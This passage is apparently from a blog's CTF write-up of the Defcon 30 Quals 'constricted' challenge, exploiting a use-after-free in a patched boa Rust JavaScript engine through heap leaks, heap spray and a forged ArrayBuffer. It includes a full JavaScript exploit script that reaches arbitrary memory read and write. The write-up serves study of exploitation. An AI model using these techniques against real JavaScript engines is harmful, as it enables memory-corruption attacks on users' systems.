@0x73dcb28e83a8</span><br><span class="line">- Methods 
@0x73dcb2809310</span><br><span class="line">- Array Buffer Data @0x73dcb28e8200  &lt;----- 2</span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>The main change is that the object stored in the TimedCache went from <code>&#123;a:&#123;&#125;&#125;</code> to <code>&#123;a:&#123;&#125;, b:&#123;&#125;&#125;</code>, which grows the Object struct from 0x300 to 0x480 bytes. On the first allocation, for the ArrayBuffer Object, the allocator <strong>does not immediately</strong> split the freed 0x480 chunk and takes memory from elsewhere instead. On the second allocation, for the 0x180-byte backing store, it carves a piece out of this hole, and 0x180 happens to be the minimum size of an Object struct.</p><p>Let's check that the reclaim really worked. Append <code>debug(uaf_obj)</code> to the JS code and look at the output:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">JsValue @0x701d8021d110</span><br><span class="line">Object @0x701d802f0228</span><br><span class="line">- Methods @0x0</span><br></pre></td></tr></table></figure><p>A freshly allocated ArrayBuffer clears all the data in its backing store, so the Methods address of uaf_obj is now a null pointer, which confirms that the spray succeeded.</p><h3 id="d-fake-obj">d. 
fake obj</h3><p>We now hold the memory hole left by the freed Object. Note that the boa process has an RWX segment, so we can try to place shellcode there and execute it:</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827145033703.png" alt="image-20220827145033703"></p><blockquote><p>This RWX segment is a bit odd: in some runs it lacks the w permission, in others it has it.</p><p>Under some conditions there may even be two RWX segments, which is curious.</p></blockquote><p>The tricky task now is <strong>building arbitrary-address read/write primitives</strong>. We can start by setting the method pointer of the forged obj and try to construct a <strong>fake ArrayBuffer</strong>:</p><blockquote><p>Debugging and the debug output show that the method pointer of the fake obj sits at offset 0x11 * 8 bytes.</p></blockquote><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">let</span> ab = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x50</span>);</span><br><span class="line">views.<span class="title function_">setBigInt64</span>(<span class="number">8</span> * <span class="number">0x11</span>, <span class="title class_">BigInt</span>(<span class="title function_">get_method_addr</span>(ab)), <span class="literal">true</span>);</span><br></pre></td></tr></table></figure><p>But with only this change, and without also setting the Object's enum kind to ArrayBuffer, using this ArrayBuffer raises an exception:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Uncaught &quot;TypeError&quot;: &quot;buffer must be an ArrayBuffer&quot;</span><br></pre></td></tr></table></figure><p>I tried to build a complete ArrayBuffer, but with only the previously leaked heap addresses this is nearly impossible, because the internal structure is far too complex:</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827195903386.png" alt="image-20220827195903386"></p><p>It involves heap, stack, and binary addresses, but so far only heap addresses are available. The stack and the binary base address would also have to be leaked before the whole fake obj could be built.</p><p>So how do we leak the stack and the binary base address? Reuse the old trick: print the freed chunk and see whether it holds anything useful. Interestingly, as the exploit grew, <strong>the leak primitive that originally yielded only two heap pointers suddenly started leaking a binary base address as well</strong>:</p><p><img 
src="/2022/08/defcon30quals_constricted/image-20220827171215486.png" alt="image-20220827171215486"></p><p>We now have <strong>the base addresses of two heaps</strong> and <strong>the load base address of the binary</strong>, but still no stack pointer. However, the program <strong>panics outright</strong> instead of hitting a segmentation fault, which suggests that the pointers inside the ArrayBuffer are never used. Otherwise an invalid pointer dereference would have crashed it directly.</p><p>Since the pointers are unused, let's just fill in some made-up data and see what happens. First we need the relative offset of <code>ObjectKind</code> inside the <code>ObjectData</code> struct. The debugger shows that the offset is 0:</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827203907974.png" alt="image-20220827203907974"></p><p>Then we set some <strong>non-pointer data</strong> (probably enums and the like) and attempt an arbitrary-address read:</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 3. 
fake obj</span></span><br><span class="line"><span class="keyword">let</span> <span class="variable">views</span> = new <span class="title function_ invoke__">DataView</span>(spray_objs[<span class="number">0</span>]);</span><br><span class="line"><span class="comment">// try to restore the data</span></span><br><span class="line"><span class="keyword">let</span> <span class="variable">ab</span> = new <span class="title function_ invoke__">ArrayBuffer</span>(<span class="number">0x100</span>);</span><br><span class="line"><span class="comment">// ArrayBuffer ptr</span></span><br><span class="line"><span class="keyword">let</span> <span class="variable">ptr</span> = base_addr</span><br><span class="line"></span><br><span class="line"><span class="comment">// Object Kind (ArrayBuffer)</span></span><br><span class="line">views.<span class="title function_ invoke__">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x05</span>, <span class="number">0x02</span>n, <span class="literal">true</span>);        </span><br><span class="line"><span class="comment">// Target pointer</span></span><br><span class="line">views.<span class="title function_ invoke__">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x06</span>, <span class="title function_ invoke__">BigInt</span>(ptr), <span class="literal">true</span>);</span><br><span class="line"><span class="comment">// some size</span></span><br><span class="line">views.<span class="title function_ invoke__">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x07</span>, <span class="number">0x100</span>n, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_ invoke__">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x08</span>, <span class="number">0x100</span>n, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_ 
invoke__">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x09</span>, <span class="number">0x100</span>n, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_ invoke__">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x0a</span>, <span class="number">0x101</span>n, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_ invoke__">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x11</span>, <span class="title function_ invoke__">BigInt</span>(<span class="title function_ invoke__">get_method_addr</span>(ab)), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">debug</span>(ab);</span><br><span class="line"><span class="title function_ invoke__">debug</span>(new_uaf_obj)</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> <span class="variable">new_view</span> = new <span class="title function_ invoke__">DataView</span>(new_uaf_obj);</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> <span class="variable">i</span> = <span class="number">0</span>; i &lt; new_view.byteLength / <span class="number">8</span>; i++)</span><br><span class="line">    <span class="title function_ invoke__">log</span>(new_view.<span class="title function_ invoke__">getBigUint64</span>(<span class="number">8</span> * i).<span class="title function_ invoke__">toString</span>(<span class="number">16</span>))</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">bp</span>();</span><br></pre></td></tr></table></figure><p>Output:</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827204926541.png" alt="image-20220827204926541"></p><p>The fake object is now recognized as an ArrayBuffer, and reading at the binary base address returns the ELF 
header. <strong>The arbitrary-address read primitive is complete</strong>!</p><p>Attempting a write through the fake obj, however, triggers a panic:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">thread &#x27;main&#x27; panicked at &#x27;Object already borrowed: BorrowMutError&#x27;, boa_engine/src/builtins/dataview/mod.rs:684:40</span><br></pre></td></tr></table></figure><p>Debugging reveals the offset of <code>self.flags</code> relative to the <code>ArrayBuffer</code>. Setting it to <code>0</code> makes the panic go away:</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827221449146.png" alt="image-20220827221449146"></p><p>Next, though, the GC hits a null pointer dereference. The backtrace shows that the crash happens when BigUint64Array tries to obtain a mut reference: this triggers the fake obj's GC logic, which starts to recursively mark the data structures of its fields. Because the fake obj still has some problems and was not fully restored, the crash occurs while recursively tracing the PropertyMap:</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827223835389.png" alt="image-20220827223835389"></p><p>Let's see whether the GC can be bypassed. Reading the code shows that the GC is skipped as long as the condition guarding this root call is not met:</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827224113174.png" alt="image-20220827224113174"></p><p>That condition in turn depends on the <code>self.flags</code> value just set. Setting it to 0 was exactly the wrong choice (facepalm); it should be 1. With that in place, we reach the memory-write stage:</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827224237536.png" alt="image-20220827224237536"></p><p>The screenshot above shows a SIGSEGV during the write. That is entirely expected: the memory holding the ELF header is not writable, so the write aborts.</p><p>Let's test with a different address:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// test read and write</span></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span 
class="number">0x06</span>, <span class="title class_">BigInt</span>(base_addr + <span class="number">0x1218000</span>), <span class="literal">true</span>);</span><br><span class="line"><span class="title function_">log</span>(new_view.<span class="title function_">getBigUint64</span>(<span class="number">0</span>).<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line">new_view.<span class="title function_">setBigUint64</span>(<span class="number">0</span>, <span class="number">0x1122334455667788n</span>);</span><br><span class="line"><span class="title function_">log</span>(new_view.<span class="title function_">getBigUint64</span>(<span class="number">0</span>).<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line"></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x06</span>, <span class="title class_">BigInt</span>(base_addr + <span class="number">0x1218100</span>), <span class="literal">true</span>);</span><br><span class="line"><span class="title function_">log</span>(new_view.<span class="title function_">getBigUint64</span>(<span class="number">0</span>).<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line">new_view.<span class="title function_">setBigUint64</span>(<span class="number">0</span>, <span class="number">0x33445566778899aan</span>);</span><br><span class="line"><span class="title function_">log</span>(new_view.<span class="title function_">getBigUint64</span>(<span class="number">0</span>).<span class="title function_">toString</span>(<span class="number">16</span>));</span><br></pre></td></tr></table></figure><p>The values have been written to the target memory region:</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827225551875.png" alt="image-20220827225551875"></p><p>The <strong>arbitrary-address write primitive</strong> is complete!</p><h2 
id="六、后续">VI. Follow-up</h2><p>Once the <strong>arbitrary-address read/write primitives</strong> are in place, the rest of the exploit is grunt work. With them we can leak the stack, libc, and any other addresses, place a ROP chain in the data segment, and then hijack control flow via a stack pivot to get a shell; I will not go into those details.</p><p>Below is the code for the arbitrary-address read/write primitives. Note that this exp was tested on my local machine, so some offsets and the heap layout may differ in other environments.</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span 
class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span 
class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// tools wrapper</span></span><br><span class="line"><span class="keyword">let</span> <span class="title function_">log</span> = (<span class="params">x</span>) =&gt; &#123; <span class="variable language_">console</span>.<span class="title function_">log</span>(x) &#125;;</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">debug</span> = (<span class="params">x</span>) =&gt; &#123; <span class="title function_">log</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(x)) &#125;;</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">gc</span> = (<span class="params"></span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">collectGarbage</span>();</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">bp</span> = (<span class="params"></span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">sysbreak</span>();</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">sleep</span> = (<span class="params">x</span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">sleep</span>(x);</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">hex</span> = (<span class="params">x</span>) =&gt; 
(<span class="string">&quot;0x&quot;</span> + x.<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line"></span><br><span class="line"><span class="comment">// parse tools</span></span><br><span class="line"><span class="comment">// let get_js_value = (obj) =&gt; </span></span><br><span class="line"><span class="comment">//     Number.parseInt(console.debug(obj).split(&quot;JsValue @&quot;)[1].split(&quot;\n&quot;)[0]);</span></span><br><span class="line"><span class="keyword">let</span> <span class="title function_">get_obj_addr</span> = (<span class="params">obj</span>) =&gt; </span><br><span class="line">    <span class="title class_">Number</span>.<span class="built_in">parseInt</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(obj).<span class="title function_">split</span>(<span class="string">&quot;Object @&quot;</span>)[<span class="number">1</span>].<span class="title function_">split</span>(<span class="string">&quot;\n&quot;</span>)[<span class="number">0</span>]);</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">get_method_addr</span> = (<span class="params">obj</span>) =&gt; </span><br><span class="line">    <span class="title class_">Number</span>.<span class="built_in">parseInt</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(obj).<span class="title function_">split</span>(<span class="string">&quot;Methods @&quot;</span>)[<span class="number">1</span>].<span class="title function_">split</span>(<span class="string">&quot;\n&quot;</span>)[<span class="number">0</span>]);</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">get_buffer_data_addr</span> = (<span class="params">obj</span>) =&gt; </span><br><span class="line">    <span class="title class_">Number</span>.<span class="built_in">parseInt</span>(<span 
class="variable language_">console</span>.<span class="title function_">debug</span>(obj).<span class="title function_">split</span>(<span class="string">&quot;Buffer Data @&quot;</span>)[<span class="number">1</span>].<span class="title function_">split</span>(<span class="string">&quot;\n&quot;</span>)[<span class="number">0</span>]);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> fake_timeout = &#123; <span class="title function_">valueOf</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[+] fake_timeout called&quot;</span>);</span><br><span class="line">    <span class="title function_">sleep</span>(<span class="number">2000</span>);</span><br><span class="line">    <span class="title function_">gc</span>();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>; </span><br><span class="line">&#125;&#125;;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 1. 
leak heap addresses</span></span><br><span class="line"><span class="keyword">let</span> cache = <span class="keyword">new</span> <span class="title class_">TimedCache</span>();</span><br><span class="line">cache.<span class="title function_">set</span>(<span class="string">&#x27;leak&#x27;</span>, <span class="keyword">new</span> <span class="title class_">Uint32Array</span>(<span class="number">20</span>), <span class="number">1000</span>);</span><br><span class="line"><span class="keyword">let</span> uaf_obj = cache.<span class="title function_">get</span>(<span class="string">&quot;leak&quot;</span>, fake_timeout);</span><br><span class="line"></span><br><span class="line"><span class="title function_">debug</span>(uaf_obj);</span><br><span class="line"><span class="title function_">log</span>(uaf_obj.<span class="property">length</span>)</span><br><span class="line"><span class="comment">// for (let i = 0; i &lt; uaf_obj.length; ++i) &#123;</span></span><br><span class="line"><span class="comment">//     log(i + &quot; =&gt; &quot; + uaf_obj[i]);</span></span><br><span class="line"><span class="comment">// &#125;</span></span><br><span class="line"></span><br><span class="line">lower_heap_addr = uaf_obj[<span class="number">3</span>] * <span class="number">0x100000000</span> + uaf_obj[<span class="number">2</span>] - <span class="number">0x440f0</span>;</span><br><span class="line">base_addr = uaf_obj[<span class="number">5</span>] * <span class="number">0x100000000</span> + uaf_obj[<span class="number">4</span>] - <span class="number">0x11a9678</span>;</span><br><span class="line">higher_heap_addr = uaf_obj[<span class="number">17</span>] * <span class="number">0x100000000</span> + uaf_obj[<span class="number">16</span>] - <span class="number">0x1f07</span>;</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] lower_heap_addr: &quot;</span> + <span class="title function_">hex</span>(lower_heap_addr)); 
</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] higher_heap_addr: &quot;</span> + <span class="title function_">hex</span>(higher_heap_addr));</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] base_addr: &quot;</span> + <span class="title function_">hex</span>(base_addr));</span><br><span class="line"><span class="keyword">if</span> (((lower_heap_addr | higher_heap_addr | base_addr) &amp; <span class="number">0xfff</span>) != <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[-] Error wrong addr.&quot;</span>)</span><br><span class="line">    <span class="title function_">bp</span>(); <span class="comment">// quit</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] Leak successfuly.&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">// 2. 
heap spray</span></span><br><span class="line"><span class="keyword">let</span> new_cache = <span class="keyword">new</span> <span class="title class_">TimedCache</span>();</span><br><span class="line">new_cache.<span class="title function_">set</span>(<span class="string">&#x27;spray&#x27;</span>, &#123;<span class="attr">a</span>:&#123;&#125;, <span class="attr">b</span>:&#123;&#125;&#125;, <span class="number">1000</span>);</span><br><span class="line"><span class="keyword">let</span> new_uaf_obj = new_cache.<span class="title function_">get</span>(<span class="string">&quot;spray&quot;</span>, fake_timeout);</span><br><span class="line"><span class="title function_">debug</span>(new_uaf_obj)</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> spray_objs = [];</span><br><span class="line"><span class="comment">// in practice a single allocation is enough</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">1</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">let</span> obj = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x180</span>);</span><br><span class="line">    <span class="title function_">debug</span>(obj);</span><br><span class="line">    spray_objs.<span class="title function_">push</span>(obj);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="title function_">get_buffer_data_addr</span>(spray_objs[<span class="number">0</span>]) + <span class="number">0x28</span> != <span class="title function_">get_obj_addr</span>(new_uaf_obj)) &#123;</span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[-] Error heap spray failed.&quot;</span>)</span><br><span class="line">    <span class="title function_">bp</span>(); <span 
class="comment">// quit</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] Heap spray successfuly.&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">// 3. fake obj</span></span><br><span class="line"><span class="keyword">let</span> views = <span class="keyword">new</span> <span class="title class_">DataView</span>(spray_objs[<span class="number">0</span>]);</span><br><span class="line"><span class="comment">// // debug write</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; views.<span class="property">byteLength</span> / <span class="number">8</span>; i++)</span><br><span class="line">    views.<span class="title function_">setBigUint64</span>(<span class="number">8</span>*i, <span class="title class_">BigInt</span>(i*<span class="number">0x10000</span> + i), <span class="literal">true</span>);</span><br><span class="line"><span class="comment">// try to restore the data</span></span><br><span class="line"><span class="keyword">let</span> ab = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x100</span>);</span><br><span class="line"><span class="comment">// ArrayBuffer ptr</span></span><br><span class="line"><span class="keyword">let</span> ptr = base_addr</span><br><span class="line"></span><br><span class="line"><span class="comment">// mem chunk header</span></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x00</span>, <span class="number">0x00n</span>, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x01</span>, <span class="title 
class_">BigInt</span>(lower_heap_addr + <span class="number">0x440f0</span>), <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x02</span>, <span class="title class_">BigInt</span>(base_addr + <span class="number">0x11a9678</span>), <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x03</span>, <span class="number">0x100n</span>, <span class="literal">true</span>);</span><br><span class="line"><span class="comment">// mut borrow flag</span></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x04</span>, <span class="number">0x01n</span>, <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Object Kind (ArrayBuffer)</span></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x05</span>, <span class="number">0x02n</span>, <span class="literal">true</span>);        </span><br><span class="line"><span class="comment">// Target pointer</span></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x06</span>, <span class="title class_">BigInt</span>(ptr), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// some size</span></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x07</span>, <span class="number">0x100n</span>, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span 
class="number">8</span> * <span class="number">0x08</span>, <span class="number">0x100n</span>, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x09</span>, <span class="number">0x100n</span>, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x0a</span>, <span class="number">0x101n</span>, <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x0e</span>, <span class="title class_">BigInt</span>(ptr), <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x0f</span>, <span class="number">0x100n</span>, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x10</span>, <span class="number">0x100n</span>, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x11</span>, <span class="title class_">BigInt</span>(<span class="title function_">get_method_addr</span>(ab)), <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x13</span>, <span class="title class_">BigInt</span>(base_addr + <span class="number">0xeab740</span>), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> 
* <span class="number">0x1a</span>, <span class="number">0x08n</span>, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x21</span>, <span class="number">0x08n</span>, <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x13</span>, <span class="number">0x08n</span>, <span class="title class_">BigInt</span>(base_addr + <span class="number">0xeab740</span>));</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x17</span>, <span class="number">0x08n</span>, <span class="title class_">BigInt</span>(base_addr + <span class="number">0xeab740</span>));</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x1e</span>, <span class="number">0x08n</span>, <span class="title class_">BigInt</span>(base_addr + <span class="number">0xeab740</span>));</span><br><span class="line"></span><br><span class="line"><span class="title function_">debug</span>(ab);</span><br><span class="line"><span class="title function_">debug</span>(new_uaf_obj);</span><br><span class="line"><span class="comment">// bp();</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> new_view = <span class="keyword">new</span> <span class="title class_">DataView</span>(new_uaf_obj);</span><br><span class="line"></span><br><span class="line"><span class="comment">// test read and write</span></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x06</span>, <span class="title class_">BigInt</span>(base_addr + <span 
class="number">0x1218000</span>), <span class="literal">true</span>);</span><br><span class="line"><span class="title function_">log</span>(new_view.<span class="title function_">getBigUint64</span>(<span class="number">0</span>).<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line">new_view.<span class="title function_">setBigUint64</span>(<span class="number">0</span>, <span class="number">0x1122334455667788n</span>);</span><br><span class="line"><span class="title function_">log</span>(new_view.<span class="title function_">getBigUint64</span>(<span class="number">0</span>).<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line"></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x06</span>, <span class="title class_">BigInt</span>(base_addr + <span class="number">0x1218100</span>), <span class="literal">true</span>);</span><br><span class="line"><span class="title function_">log</span>(new_view.<span class="title function_">getBigUint64</span>(<span class="number">0</span>).<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line">new_view.<span class="title function_">setBigUint64</span>(<span class="number">0</span>, <span class="number">0x33445566778899aan</span>);</span><br><span class="line"><span class="title function_">log</span>(new_view.<span class="title function_">getBigUint64</span>(<span class="number">0</span>).<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line"></span><br><span class="line"><span class="title function_">bp</span>();</span><br></pre></td></tr></table></figure><p>That concludes this review. Along the way I mainly learned about some of Rust's characteristics at the binary level, and this challenge also served as my first small step into Rust pwn.</p><h2 id="七、参考">VII. References</h2><p>This review relied throughout on r3kapig's Defcon-30-Quals write-up and the discussion in the team's group chat. Many thanks to everyone at r3kapig!</p>]]></content>
    
    
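    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;These are my notes from revisiting the &lt;code&gt;constricted&lt;/code&gt; challenge from Defcon 30 Quals.&lt;/p&gt;
&lt;p&gt;The challenge provides a git diff against the &lt;code&gt;boa&lt;/code&gt; project and asks you to exploit boa after applying it. boa is a &lt;strong&gt;JavaScript engine written in Rust&lt;/strong&gt;, so pwning it means writing an exploit script in JS.&lt;/p&gt;
&lt;p&gt;When I first attempted this challenge I had never touched Rust; this time, &lt;s&gt;having mastered it&lt;/s&gt;, I can take a proper look.&lt;/p&gt;
&lt;p&gt;The challenge is meant to show that &lt;strong&gt;even programs written in Rust can still contain vulnerabilities&lt;/strong&gt;.&lt;/p&gt;</summary>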
    
    
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
